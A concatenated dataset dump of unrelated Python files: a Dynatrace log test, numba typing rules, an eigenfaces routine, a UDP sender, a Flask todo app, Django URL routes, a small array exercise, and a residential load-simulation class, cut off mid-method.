UserTask \n task = UserTask()\n task.SerNr = self.Task\n if (task.load()):\n self.TaskTitle = task.Title","sub_path":"standard/records/Schedule.py","file_name":"Schedule.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"302744444","text":"# Copyright 2020 Dynatrace LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specassertic language governing permissions and\n# limitations under the License.\n\nimport os\n\nimport requests\n\n\ndef test_environment_vars():\n assert \"DYNATRACE_URL\" in os.environ\n assert \"DYNATRACE_ACCESS_KEY\" in os.environ\n assert \"DEPLOYMENT_TYPE\" in os.environ\n assert \"TRAVIS_BUILD_ID\" in os.environ\n assert \"START_LOAD_GENERATION\" in os.environ\n assert \"END_LOAD_GENERATION\" in os.environ\n\n\ndef test_logs_on_dynatrace():\n url = f\"{os.environ.get('DYNATRACE_URL')}api/v2/logs/search\"\n params = {\n 'from': os.environ.get('START_LOAD_GENERATION'),\n 'to': os.environ.get('END_LOAD_GENERATION'),\n 'query': f\"TYPE: {os.environ.get('DEPLOYMENT_TYPE')}, BUILD: {os.environ.get('TRAVIS_BUILD_ID')}, INFO: This is sample app\"\n }\n headers = {\n 'Authorization': f\"Api-Token {os.environ.get('DYNATRACE_ACCESS_KEY')}\"\n }\n resp = requests.get(url, params=params, headers=headers)\n\n assert resp.status_code == 200\n assert len(resp.json()['results']) == 5\n","sub_path":"tests/e2e/logs/test_e2e.py","file_name":"test_e2e.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504088001","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nDefault rules for the typing of constants.\n\"\"\"\n\nfrom __future__ import print_function, division, absolute_import\n\nimport math\nimport types\nimport ctypes\nfrom functools import partial\n\nimport numba.typesystem\nfrom numba.typesystem import itypesystem, numpy_support\nfrom numba import numbawrapper\n\nfrom numba.support.ctypes_support import is_ctypes, from_ctypes_value\nfrom numba.support import cffi_support\n\nimport numpy as np\nimport datetime\n\n#------------------------------------------------------------------------\n# Class -> Type\n#------------------------------------------------------------------------\n\ndef get_typing_defaults(u):\n \"\"\"\n Get a simple table mapping Python classes to types.\n\n :param u: The type universe\n \"\"\"\n typing_defaults = {\n float: u.double,\n bool: u.bool_,\n complex: u.complex128,\n str: u.string_,\n #datetime.datetime: u.datetime,\n np.datetime64: u.datetime(),\n np.timedelta64: u.timedelta(),\n }\n return typing_defaults\n\n#------------------------------------------------------------------------\n# Class -> pyval -> Type\n#------------------------------------------------------------------------\n\ndef get_default_typing_rules(u, typeof, promote):\n \"\"\"\n Get a table mapping Python classes to handlers (value -> type)\n\n :param u: The type universe\n \"\"\"\n\n table = {}\n def register(*classes):\n def dec(func):\n for cls in classes:\n table[cls] = lambda u, value: func(value)\n return func\n return dec\n\n @register(int, long)\n def type_int(value):\n if abs(value) < 1:\n bits = 0\n else:\n bits = math.ceil(math.log(abs(value), 2))\n\n if bits < 32:\n return u.int_\n elif bits < 64:\n return u.int64\n else:\n raise ValueError(\"Cannot represent %s as int32 or int64\", value)\n\n @register(np.ndarray)\n def type_ndarray(value):\n if isinstance(value, np.ndarray):\n dtype = numpy_support.map_dtype(value.dtype)\n return u.array(dtype, value.ndim)\n #is_c_contig=value.flags['C_CONTIGUOUS'],\n #is_f_contig=value.flags['F_CONTIGUOUS'])\n\n @register(tuple, list, dict)\n def type_container(value):\n assert isinstance(value, (tuple, list, dict))\n\n if isinstance(value, dict):\n key_type = type_container(value.keys())\n value_type = type_container(value.values())\n return u.dict_(key_type, value_type, size=len(value))\n\n if isinstance(value, tuple):\n container_type = u.tuple_\n else:\n container_type = u.list_\n\n if 0 < len(value) < 30:\n # Figure out base type if the container is not too large\n # base_type = reduce(promote, (typeof(child) for child in value))\n ty = typeof(value[0])\n if all(typeof(child) == ty for child in value):\n base_type = ty\n else:\n base_type = u.object_\n else:\n base_type = u.object_\n\n return container_type(base_type, size=len(value))\n\n register(np.dtype)(lambda value: u.numpy_dtype(numpy_support.map_dtype(value)))\n register(types.ModuleType)(lambda value: u.module(value))\n register(itypesystem.Type)(lambda value: u.meta(value))\n\n return table\n\ndef get_constant_typer(universe, typeof, promote):\n \"\"\"\n Get a function mapping values to types, which returns None if unsuccessful.\n \"\"\"\n typetable = get_typing_defaults(universe)\n handler_table = get_default_typing_rules(universe, typeof, promote)\n return itypesystem.ConstantTyper(universe, typetable, handler_table).typeof\n\n#------------------------------------------------------------------------\n# Constant matching ({ pyval -> bool : pyval -> Type })\n#------------------------------------------------------------------------\n\n# TODO: Make this a well-defined (easily overridable) matching table\n# E.g. { \"numpy\" : { is_numpy : get_type } }\n\ndef is_dtype_constructor(value):\n return isinstance(value, type) and issubclass(value, np.generic)\n\ndef is_numpy_scalar(value): \n return isinstance(value, np.generic)\n\ndef is_registered(value):\n from numba.type_inference import module_type_inference\n return module_type_inference.is_registered(value)\n\ndef from_ctypes(value, u):\n result = from_ctypes_value(value)\n if result.is_function:\n pointer = ctypes.cast(value, ctypes.c_void_p).value\n return u.pointer_to_function(value, pointer, result)\n else:\n return result\n\ndef from_cffi(value, u):\n signature = cffi_support.get_signature(value)\n pointer = cffi_support.get_pointer(value)\n return u.pointer_to_function(value, pointer, signature)\n\ndef from_typefunc(value, u):\n from numba.type_inference import module_type_inference\n result = module_type_inference.module_attribute_type(value)\n if result is not None:\n return result\n else:\n return u.known_value(value)\n\nis_numba_exttype = lambda value: hasattr(type(value), '__numba_ext_type')\nis_NULL = lambda value: value is numba.NULL\nis_autojit_func = lambda value: isinstance(\n value, numbawrapper.NumbaSpecializingWrapper)\n\ndef get_default_match_table(u):\n \"\"\"\n Get a matcher table: { (type -> bool) : (value -> type) }\n \"\"\"\n table = {\n is_NULL:\n lambda value: numba.typesystem.null,\n is_dtype_constructor:\n lambda value: numba.typesystem.from_numpy_dtype(np.dtype(value)),\n is_numpy_scalar:\n lambda value: numpy_support.map_dtype(value.dtype),\n is_ctypes:\n lambda value: from_ctypes(value, u),\n cffi_support.is_cffi_func:\n lambda value: from_cffi(value, u),\n is_numba_exttype:\n lambda value: getattr(type(value), '__numba_ext_type'),\n numbawrapper.is_numba_wrapper:\n lambda value: u.jit_function(value),\n is_autojit_func:\n lambda value: u.autojit_function(value),\n is_registered:\n lambda value: from_typefunc(value, u),\n }\n\n return table\n\ndef find_match(matchtable, value):\n for matcher, typefunc in matchtable.iteritems():\n if matcher(value):\n result = typefunc(value)\n assert result is not None\n return result\n\n return None\n\n#------------------------------------------------------------------------\n# Typeof\n#------------------------------------------------------------------------\n\ndef object_typer(universe, value):\n return universe.object_\n\ndef find_first(callables, value):\n for callable in callables:\n result = callable(value)\n if result is not None:\n return result\n\n assert False, (callables, value)\n\ndef get_default_typeof(universe, promote):\n typeof1 = get_constant_typer(universe, lambda value: typeof(value), promote)\n typeof2 = partial(find_match, get_default_match_table(universe))\n typeof3 = partial(object_typer, universe)\n typeof = partial(find_first, [typeof1, typeof2, typeof3])\n return typeof\n","sub_path":"oldnumba/typesystem/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":7168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"158615784","text":"import numpy as np\n\nfrom const import *\n\n\n__author__ = \"Joseph, Fernando\"\n\n\ndef eigenfaces(faces, num_eigenfaces):\n \"\"\" Given a set of face vectors (faces), compute the eigenfaces -\n\n a set of the most important (associated with the highest eigenvalues)\n eigenvectors of the covariance matrix (AA^T). Also return the mean face.\n \"\"\"\n\n # Compute the mean.\n mean = face_mean(faces)\n\n # Calculate the difference from the mean for each face.\n diffs = []\n for face in faces:\n diff = face - mean\n diffs.append(diff)\n\n # Compute the normalized faces matrix.\n A = np.column_stack(diffs)\n\n # Compute (A transpose)(A), a matrix which will allow\n # us to find the eigenvectors of the covariance matrix.\n C = np.matmul(A.T, A)\n\n # Compute eigenvalues of (A transpose)(A).\n # Using eigh rather than eig is efficient when working with\n # a symmetric matrix.\n (eigen_values, eigen_vectors) = np.linalg.eigh(C)\n\n # eigen_vectors (matrix) contains one in each column, but iteration\n # happens, by default, through the rows. So we should transpose\n # the matrix before continuing.\n combined = list(zip(eigen_vectors.T, eigen_values))\n combined.sort(key=lambda t: t[1], reverse=True)\n combined_best = combined[0:num_eigenfaces]\n eigen_vectors_best = [t[0] for t in combined_best]\n\n # Compute best eigenvectors of (A)(A transpose).\n # These will be our eigenfaces.\n eigen_faces = []\n for eigen_vector in eigen_vectors_best:\n eigen_face_scaled = A.dot(eigen_vector)\n eigen_face = eigen_face_scaled / np.linalg.norm(eigen_face_scaled)\n eigen_faces.append(eigen_face)\n\n return mean, eigen_faces\n\n\ndef face_mean(faces):\n mean = np.zeros(IMG_SIZE).flatten()\n for face in faces:\n mean = np.add(mean, face)\n mean /= len(faces)\n\n return mean\n\n\ndef face_class(mean, basis, faces):\n # Find coords of each normalize face w/r/t\n # the eigenfaces.\n fclass = np.zeros(basis.shape[0]).flatten()\n for face in faces:\n diff = face - mean\n coords = basis.dot(diff)\n\n fclass += coords\n fclass /= len(faces)\n\n return fclass\n\n\ndef reconstruct(mean, basis, coords):\n res = np.matmul(coords, basis)\n res += mean\n return res\n","sub_path":"compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32949555","text":"import socket as s\nimport os, time, sys\nimport errno\nimport Network as Network\n\ndur = 0.02\n\nif __name__ == '__main__':\n\n ip_recv = \"192.168.1.102\"\n port_recv = 5005\n\n receiver = Network.UDP_Receiver(ip_recv, port_recv)\n\n ip_send = \"192.168.1.104\"\n port_send = 5005\n\n sender = Network.UDP_Sender(ip_send, port_send)\n\n print('sending ...')\n\n while 1: # loop forever\n # data, addr = sock.recvfrom(1024) # wait to receive data\n data, addr = receiver.recv()\n # print(data)\n sample = (data.replace('{', '').replace('}', '').replace(' ', '').split(','))\n # print(sample)\n\n if (\"'SHZ'\") in sample:\t#removes 'SHZ' from the received data\n sample.remove(\"'SHZ'\")\n\n initial_time = float(sample.pop(0))\n\n for i in range(len(sample)):\n ts = initial_time + i * dur\n\n try:\n send_vib = 'vib:%.3f %s|' % (ts, sample[i])\n sender.send(send_vib)\n\n # pipe_write(pipe_out, send_vib)\n\n print('Writer) wrote: %s' % send_vib)\n\n # file.write(send_vib[4:-1] +'\\n')\n\n except OSError as err:\n\n if err.errno == 32:\n # send_vib = None\n sys.exit(0)\n else:\n raise err\n\n","sub_path":"vibration_udp_send.py","file_name":"vibration_udp_send.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"245625901","text":"from flask import Flask, render_template, request, redirect, url_for, flash, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\n\napp = Flask(__name__)\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test_flask.db'\ndb = SQLAlchemy(app)\n\nclass Todo(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n content = db.Column(db.String(200), nullable=False)\n date_created = db.Column(db.DateTime, default=datetime.utcnow)\n\n def __repr__(self):\n return '' % self.id\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n task_content = request.form['content']\n if not task_content:\n flash('You must enter some content!')\n return redirect(url_for('index'))\n\n new_task = Todo(content=task_content)\n\n try:\n db.session.add(new_task)\n db.session.commit()\n flash('Your task has been added!')\n return redirect(url_for('index'))\n except:\n db.session.rollback()\n flash('There was an issue adding your task')\n return redirect(url_for('index'))\n else:\n tasks = Todo.query.order_by(Todo.date_created.desc()).all()\n return render_template('index.html', tasks=tasks)\n\n\n@app.route('/update/', methods=['GET', 'POST'])\ndef update(id):\n task = Todo.query.get_or_404(id)\n if request.method == 'POST':\n task.content = request.form['content']\n try:\n db.session.commit()\n flash('Task Updated')\n return redirect(url_for('index'))\n # return redirect('/')\n except:\n db.session.rollback()\n flash('There was an issue updating the task')\n return redirect(url_for('update'))\n # return 'There was an issue updating the task'\n else:\n return render_template('update.html', task=task)\n\n\n@app.route('/delete/')\ndef delete(id):\n task = Todo.query.get_or_404(id)\n if not task:\n # return 'No task found'\n flash('No task found')\n return redirect(url_for('index'))\n try:\n db.session.delete(task)\n db.session.commit()\n flash('Task deleted successfully')\n return redirect(url_for('index'))\n # return redirect('/')\n except:\n db.session.rollback()\n flash('There was an issue deleting the task')\n return redirect(url_for('index'))\n # return 'There was an issue deleting the task'\n\n\nif (__name__ == '__main__'):\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"331781459","text":"from django.urls import path\nfrom . import views\n\napp_name = \"cisco1\"\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('login/', views.UserLoginView.as_view(), name='login'),\n path('userlist/', views.UserView.as_view(), name='user'),\n path('certAdminView/', views.CertAdminView.as_view(), name='certAdminView'),\n path('certAdminAdd/', views.CertAdminAction.as_view(), name='certAdminAction'),\n path('trainingAdminAdd/', views.TrainingAdminAction.as_view(), name='trainingAdminAdd'),\n path('details/', views.MoreDetails, name='moreDetails'),\n path('groupadd/', views.GroupAdd.as_view(), name='groupAdd'),\n path('addGroupmember///', views.AddGroupMember.as_view(), name='addGroupMember'),\n path('certAdd/', views.CertAddView.as_view(), name='certAdd'),\n path('viewUser/', views.UserList.as_view(), name='view'),\n path('userUpdate/', views.UserUpdate.as_view(),name='userupdate'),\n path('mgrdown/', views.ManagerDown.as_view(), name='mgrdown'),\n path('trainingAdd/', views.TrainingAddView.as_view(), name='trainingAdd'),\n path('managerview/', views.ManagerView.as_view(), name='managerView'),\n path('trainingDetail//', views.TrainingDetail.as_view(), name='trainingDetail'),\n path('certDetail//', views.certDetail.as_view(), name='certDetail'),\n path('verifyAdmin/', views.VerifyAdmin.as_view(), name='verifyAdmin'),\n path('trainingaction///', views.TrainingAction.as_view(), name='trainingAction'),\n path('certaction///', views.CertAction.as_view(), name='certAction'),\n path('peopleadminview/', views.PeopleAdminView.as_view(), name='peopleAdminView'),\n path('userAdd/', views.UserADD.as_view(), name='userAdd'),\n path('peoplegroup//', views.PeopleGroupAction.as_view(), name=\"peopleGroupAction\"),\n path('success/', views.SuccessView.as_view(), name='success'),\n path('error/', views.ErrorView.as_view(), name='error'),\n path('logout/', views.user_logout, name='logout'),\n path('mgrajax/', views.managerTree, name='mgrajax'),\n path('certajax/', views.load_ctypes, name='certajax'),\n path('trainingajax/', views.load_ttypes, name='trainingajax'),\n path('dir/',views.dir),\n path(\"tracking/\",views.CCIEtrackingView.as_view(),name=\"tracking\"),\n path('getReportline/', views.getReportline, name='certajax'),\n]","sub_path":"cisco1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"388857194","text":"'''\n给定一个整数数组,判断数组中是否有两个不同的索引 i 和 j,使得 nums [i] 和 nums [j] 的差的绝对值最大为 t,并且 i 和 j 之间的差的绝对值最大为 ķ。\n\n输入: nums = [1,2,3,1], k = 3, t = 0\n输出: true\n'''\n\n\ndef contains_duplicate(nums, k, t):\n i = 0\n j = len(nums) - 1\n bok = False\n while i != j:\n if j - i < k:\n i += 1\n j = len(nums) - 1\n elif j - i > k:\n j -= 1\n else:\n if abs(nums[i] - nums[j]) == t:\n bok = True\n break\n else:\n j = len(nums) - 1\n i += 1\n return bok\n\nprint(contains_duplicate([1,2,3,1], 3, 0))\nprint(contains_duplicate([1,0,1,1], 1, 2))\nprint(contains_duplicate([1,5,9,1,5,9], 2, 3))","sub_path":"code_pratice/sort/contains_duplicate.py","file_name":"contains_duplicate.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"526702455","text":"'''\n./HOUSE.py \nModule for House model\nAuthor: Ryan Tulabing\nProject: Local Demand Control\nInstitution: University of Auckland\nYear: 2017\n'''\n\n \n#---import python packages---\n# from pylab import *\nimport random\nimport datetime, time\nimport threading, queue\nimport numpy as np\nfrom scipy.integrate import odeint\nfrom multiprocessing import Pool, Queue, cpu_count\nimport multiprocessing\nimport pandas as pd\n# import sqlite3 as lite\n\n# for multicast\nimport socket\nimport struct\nimport sys\nimport json\nimport ast\n# for driving serial interface\n# import serial\n#---import local packages---\nimport MULTICAST\nimport DER, solar\nimport TCL\n\n\n#multiprocessing.Process\nclass House():\n 'Common base class for all residential buildings'\n # Attributes\n houseCount = 0\n\n \n def __init__(self, name, phase, clock, latitude, longitude, elevation, albedo, roofTilt,\\\n azimuth,floorArea, aspectRatio, ceilingHeight, windowWallRatio, windowRoofRatio,\\\n coeffWindowTransmission, glazingSHGC, Rroof, Rfloor, Rwindow, airDensity, airHeatCapacity, \\\n massQexFraction, massQinFraction, thermalMassPerArea, coeffInternalSurface, schedule_skew,\\\n hourlyAirChange, installedLights, installedAppliance, utilization, occupancy, \\\n mcast_ip_local, mcast_port_local, mcast_ip_global, mcast_port_global):\n \n # multiprocessing.Process.__init__(self)\n # self.daemon = True\n\n House.houseCount += 1\n self.name = name\n self.loadType = 'baseload'\n self.phase = phase\n self.clock = clock\n self.latitude = latitude\n self.longitude = longitude\n self.elevation = elevation\n self.albedo = albedo\n self.roofTilt = roofTilt\n self.azimuth = azimuth\n self.floorArea = floorArea\n self.ceilingHeight = ceilingHeight\n self.volume = floorArea * ceilingHeight\n self.aspectRatio = aspectRatio\n self.windowWallRatio = windowWallRatio\n self.windowRoofRatio = windowRoofRatio\n self.coeffWindowTransmission = coeffWindowTransmission\n self.glazingSHGC = glazingSHGC\n self.Rroof = Rroof\n self.Rfloor = Rfloor\n self.Rwindow = Rwindow\n self.airDensity = airDensity\n self.airHeatCapacity = airHeatCapacity\n self.massQexFraction = massQexFraction\n self.massQinFraction = massQinFraction\n self.thermalMassPerArea = thermalMassPerArea\n self.coeffInternalSurface = coeffInternalSurface\n self.schedule_skew = schedule_skew\n self.hourlyAirChange = hourlyAirChange\n \n self.width = (floorArea/aspectRatio)**0.5\n self.length = aspectRatio * self.width\n self.wallArea0 = self.width * self.ceilingHeight\n self.wallArea1 = self.width * self.ceilingHeight\n self.wallArea2 = self.length * self.ceilingHeight\n self.wallArea3 = self.length * self.ceilingHeight\n self.totalWallArea = self.wallArea0 + self.wallArea1 + self.wallArea2 + self.wallArea3\n self.totalWindowArea = self.totalWallArea * windowWallRatio\n\n self.roofArea = 0.0\n self.internalSurface = 0.0\n self.Ua = 0.0\n self.Um = 0.0\n self.Ca = 0.0\n self.Cm = 0.0\n self.heatingRate = TCL.get_heatingRate(floorArea)\n self.coolingRate = TCL.get_coolingRate(floorArea)\n self.installedPV = 0.0\n self.installedWind = 0.0\n self.irradiance = 0.0\n self.wallSolarIrradiance0 = 0.0\n self.wallSolarIrradiance1 = 0.0\n self.wallSolarIrradiance2 = 0.0\n self.wallSolarIrradiance3 = 0.0\n self.lightingLoad = 0.0\n self.applianceLoad = 0.0\n self.occupancy = 0.0\n self.occupancyLoad = 0.0\n self.occupancyFactor = 0.0\n self.applianceFactor = 0.0\n self.timestamp = self.clock.timestamp\n self.To = 0.0 # outside temperature\n self.Ta = 0.0 # inside temperature\n self.humidity = 0.0\n self.windSpeed = 0.0\n self.pressure = 0.0\n\n # calculating the U and thermal mass\n # https://www.thenbs.com/knowledge/what-is-a-u-value-heat-loss-thermal-mass-and-online-calculators-explained\n \n self.roofArea = floorArea / np.cos(np.radians(self.roofTilt))\n self.internalSurface = ((self.totalWallArea * (1-self.windowWallRatio)) + (self.roofArea * (1-self.windowRoofRatio)) + self.floorArea) \n \n self.Ua = (floorArea/Rfloor) + (self.roofArea/Rroof) + (((self.totalWindowArea) + (self.roofArea*windowRoofRatio)) / Rwindow) + ((self.totalWallArea - self.totalWindowArea)/Rfloor) # W/K note: Rfloor = Rwall\n self.Um = self.internalSurface * coeffInternalSurface * massQexFraction * massQinFraction / Rfloor # W/K\n self.Ca = airHeatCapacity * self.volume * self.airDensity # J/K\n self.Cm = self.internalSurface * thermalMassPerArea # J/K\n\n self.installedLights = installedLights\n self.installedAppliance = installedAppliance\n self.utilization = utilization\n self.occupancy = occupancy\n \n\n # collection of loads\n self.loads = []\n self.generators = [] # local generator, e.g., solar and wind\n\n # create common file for proposed demand and actual demand\n self.df_proposedDemand = pd.DataFrame()\n self.df_actualDemand = pd.DataFrame()\n self.proposedDemand = 0\n self.actualDemand = 0\n self.ourLimit = 5000\n self.housePower = 5000\n\n # ldc command storage\n self.ldc_signal = 860\n self.ldc_command = 1.0\n self.algorithm = 'A1'\n self.q_ldc = queue.Queue(maxsize=3)\n self.dict_command = {self.algorithm: self.ldc_signal}\n\n \n # history \n self.timeHistory = []\n self.flexibilityHistory = []\n self.proposedDemandHistory = []\n self.actualDemandHistory = []\n\n # declare queue's and dict holders for proposed and actual demand\n self.q_proposedDemand = queue.Queue(maxsize=3)\n self.q_actualDemand = queue.Queue(maxsize=3)\n self.q_state = queue.Queue(maxsize=3)\n self.dict_proposedDemand = {}\n self.dict_actualDemand = {}\n self.dict_state = {}\n\n # multicasting parameters\n self.mcast_ip_local = mcast_ip_local\n self.mcast_port_local = mcast_port_local\n self.mcast_ip_global = mcast_ip_global\n self.mcast_port_global = mcast_port_global\n \n # initial run of updating the data\n self.update_data()\n\n \n # run in the background\n thread1 = threading.Thread(target=self.step, args=())\n thread1.daemon = True # Daemonize thread\n thread1.start() \n\n time.sleep(3)\n \n thread = threading.Thread(target=self.receive_mcast, args=())\n thread.daemon = True # Daemonize thread\n thread.start() \n \n thread2 = threading.Thread(target=self.receive_mcast_global, args=())\n thread2.daemon = True # Daemonize thread\n thread2.start() \n \n print(\"Running...\", self.name)\n\n\n # Methods\n def displayCount(self):\n print(\"Total houses %d\" % House.houseCount)\n\n def displayHouseData(self):\n print(\"Name : \", self.name)\n print(\"Floor Area: \", self.floorArea)\n print(\"Aspect Ratio: \", self.aspectRatio)\n print(\"Floor Height: \", self.ceilingHeight)\n print(\"Window Wall Ratio: \", self.windowWallRatio)\n print(\"Window Roof Ratio: \", self.windowRoofRatio)\n print(\"Coefficient Window Heat Transmission: \", self.coeffWindowTransmission)\n print(\"Glazing SHGC: \", self.glazingSHGC)\n print(\"R-value Roof: \", self.Rroof)\n print(\"R-value Floor: \", self.Rfloor)\n print(\"R-value Window: \", self.Rwindow)\n print(\"Air Density: \", self.airDensity)\n print(\"Air Heat Capacity: \", self.airHeatCapacity)\n print(\"Mass External Heat Gain Fraction: \", self.massQexFraction)\n print(\"Mass Internal Heat Gain Fraction: \", self.massQinFraction)\n print(\"Thermal mass per floor Area: \", self.thermalMassPerArea)\n print(\"Coefficient Internal Heat Transffer: \", self.coeffInternalSurface)\n print(\"Hourly Air Change: \", self.hourlyAirChange)\n \n def displayETP(self):\n print(\"Ua = \", self.Ua)\n print(\"Um = \", self.Um)\n print(\"Ca = \", self.Ca)\n print(\"Cm = \", self.Cm)\n\n @staticmethod\n def read_csv(filename, failed=True):\n # Continually try reading csv until successful\n while failed:\n try:\n df = pd.read_csv(filename, index_col='id')\n failed = False\n except Exception as e:\n failed = True\n print(\"Error in \", self.name, \" read_csv:\", e)\n return df\n\n @staticmethod\n def populate(quantity, lowerlimit, upperlimit, average):\n # This function creates a set of numbers in gaussian distribution\n # representing the parameters of a certain load\n lower = lowerlimit\n upper = upperlimit\n mu = average\n N = quantity\n sigma = (((upper-mu)**2) + ((lower-mu)**2) )/2\n value = stats.truncnorm.rvs((lower - mu)/sigma, (upper-mu)/sigma, loc=mu, scale=sigma, size = N)\n return value\n\n \n def create_installedPV(self):\n # This function creates a hypothetical size of installed rooftop PV\n roofAreaForPV = self.floorArea * populate(1, 0.25, 0.85, 0.6) # assuming that available area for PV is 25%-85% of the floor area\n self.installedPV = roofAreaForPV * 1000. / 10. # adopting the rule of thumb: 1000 watts per 10 m^2\n return\n\n def create_installedWind(self):\n # This function creates a hypothetical size of installed wind in a house\n self.installedWind = 400. # watts, based on most common micro wind turbine: http://cleantechnica.com/2008/03/21/the-five-best-micro-wind-turbines/2/\n\n def get_solarIrrandiance(self):\n # This function predicts the solar irradiancereceived by the roof and the walls of a building\n # get irradiance received by the wall windows using HDKR method\n self.wallSolarIrradiance0 = solar.get_GtHDKR(time.localtime(float(self.timestamp)), float(self.latitude), float(self.longitude), \\\n float(self.elevation), 90., float(self.azimuth), float(self.albedo), float(self.humidity)) #\n\n self.wallSolarIrradiance1 = solar.get_GtHDKR(time.localtime(float(self.timestamp)), float(self.latitude), float(self.longitude), \\\n float(self.elevation), 90., float(self.azimuth) + 90., float(self.albedo), float(self.humidity)) #\n\n self.wallSolarIrradiance2 = solar.get_GtHDKR(time.localtime(float(self.timestamp)), float(self.latitude), float(self.longitude), \\\n float(self.elevation), 90., float(self.azimuth) - 90., float(self.albedo), float(self.humidity)) #\n \n self.wallSolarIrradiance3 = solar.get_GtHDKR(time.localtime(float(self.timestamp)), float(self.latitude), float(self.longitude), \\\n float(self.elevation), 90., float(self.azimuth) + 180., float(self.albedo), float(self.humidity)) #\n\n # for irradiance received by the rooftop using HDKR method\n self.irradiance = solar.get_GtHDKR(time.localtime(float(self.timestamp)), float(self.latitude), float(self.longitude), \\\n float(self.elevation), float(self.roofTilt), float(self.azimuth), float(self.albedo), float(self.humidity)) #\n \n \n def get_lightingLoad(self):\n # This function predicts lighting consumption within a building, residential\n # Regression function used is based on the TMY data for residential load\n t = self.clock.inHours + self.schedule_skew\n lightingFactor = 0.0\n\n if t <= 4.:\n lightingFactor = -0.03*t + 0.17\n elif 4. < t <= 8.:\n lightingFactor = 0.0561*(t-4) + 0.039\n elif 8. < t <= 12.:\n lightingFactor = -0.053*(t-8) + 0.36\n elif 12. < t <= 16.:\n lightingFactor = -0.0082*(t-12) + 0.11\n elif 16. < t <= 20.:\n lightingFactor = 0.174*(t-16)\n elif 20 < t:\n lightingFactor = -0.12*(t-20) + 0.93\n\n self.lightingLoad = self.installedLights * self.utilization * lightingFactor\n return self.lightingLoad\n\n def get_applianceLoad(self):\n # This function predicts consumption of Urgent Non-TCL loads within a building, residential\n # Regression function used is based on the TMY data for residential load\n \n t = self.clock.inHours + self.schedule_skew\n \n if t <= 4.:\n self.applianceFactor = -0.0252*t + 0.488\n self.occupancyFactor = (-0.0252*t + 0.488)\n elif 4. < t <= 8.:\n self.applianceFactor = 0.0745*(t-4) + 0.2742\n self.occupancyFactor = 0.0745*(t-4) + 0.2742\n elif 8. < t <= 12.:\n self.applianceFactor = -0.0179*(t-8) + 0.652\n self.occupancyFactor = -0.0179*(t-8) + 0.652\n elif 12. < t <= 16.:\n self.applianceFactor = -0.0096*(t-12) + 0.7427\n self.occupancyFactor = -0.0096*(t-12) + 0.7427\n elif 16. < t <= 20.:\n self.applianceFactor = 0.0662*(t-16) + 0.709\n self.occupancyFactor = 0.0662*(t-16) + 0.709\n elif 20 < t:\n self.applianceFactor = -0.085*(t-20) + 1.09\n self.occupancyFactor = -0.085*(t-20) + 1.09\n\n\n self.occupancyLoad = self.occupancyFactor * self.occupancy * 0.5\n self.applianceLoad = self.installedAppliance * self.utilization * self.applianceFactor\n\n return self.applianceLoad\n\n def update_data(self):\n # This function updates the time varying data of the house\n self.timestamp = self.clock.timestamp\n cmd = {\"W\":str(self.timestamp)}\n count = 0\n while True and (count < 5):\n try:\n dict_weather = MULTICAST.send(cmd, ip=self.mcast_ip_global, port=self.mcast_port_global)\n\n dict_weather = dict_weather[\"weather\"]\n self.To = dict_weather[\"To\"]\n self.humidity = dict_weather[\"humidity\"]\n self.windspeed = dict_weather[\"windSpeed\"]\n break\n except Exception as e:\n count += 1\n \n # # fetch new weather data if current buffer is used up\n # if self.timestamp >= int(self.outsideConditions.df_weather['unixtime'].tail(1)):\n # self.outsideConditions.get_weatherHistory(unixtime=int(self.timestamp) + (60*60*2), report=False)\n \n \n # # get weather conditions for current timestamp\n \n # self.To = np.interp([float(self.timestamp)], self.outsideConditions.df_weather['unixtime'].astype('float64'), self.outsideConditions.df_weather['temperature'].astype('float64'))[0]\n # try:\n # self.humidity = np.interp([self.timestamp],self.outsideConditions.df_weather['unixtime'],self.outsideConditions.df_weather['humidity'])[0]\n # except:\n # self.humidity = 0.90\n \n # try:\n # self.windSpeed = np.interp([self.timestamp],self.outsideConditions.df_weather['unixtime'],self.outsideConditions.df_weather['windSpeed'])[0]\n # except:\n # self.windSpeed = 0\n self.get_solarIrrandiance() # get the solar irradiance on the roof and the walls\n\n self.get_applianceLoad() # get the forecasted appliance load based on a regression formula\n self.get_lightingLoad() # get the forecasted lighting load based on a regression formula\n self.adjust_limit() # adjust the total power limit for the house\n self.broadcast(state=\"proposed\")\n self.broadcast(state=\"actual\")\n\n\n def broadcast(self, state):\n # Tell peers about my demand and flexiblity\n if state=='proposed':\n dict_demand = {str(self.name):\n {\"type\": self.loadType,\n \"unixtime\": self.timestamp,\n \"house\": self.name,\n \"demand\": self.lightingLoad + self.applianceLoad,\n \"flexibility\": 0.0,\n 